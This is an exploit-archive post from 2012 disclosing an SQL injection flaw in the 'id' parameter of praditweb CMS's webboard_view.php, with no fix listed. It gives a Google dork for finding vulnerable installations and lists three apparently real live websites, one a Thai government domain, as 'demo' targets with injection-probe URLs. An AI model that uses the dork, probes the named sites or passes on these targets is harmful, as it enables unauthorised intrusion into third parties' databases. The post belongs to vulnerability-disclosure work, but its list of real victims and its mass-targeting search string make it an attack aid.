praditweb Cms sql injection

2012-07-04 08:25:27
Inviato da: Crim3R

# Exploit Title: praditweb Cms sql injection

# Google Dork: intext:"power by praditweb.com"

# Date: 30/06/2012

# Author: Crim3R

# software Link : http://www.praditweb.com/

# Version: All

# Tested on: all



========================================

there is an sql inejection vulnerability in webboard_view.php

http://127.0.0.1/praditweb/webboard_view.php?id=1 [sql injection]

========================================
Demo:

http://www.maerang.go.th/webboard_view.php?id=150'

http://www.chiangmaisurgery.com/webboard_view.php?id=23774'

http://bodyblinksure.com/webboard_view.php?id=8903'

===============Crim3R=====================

sites :

http://irist.ir/forum/

http://security7.ir/sc/


thanks to : Amir - Skote_vahshat- 2MzRp - Mikili -

and all IrIsT & security7 Members ...

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.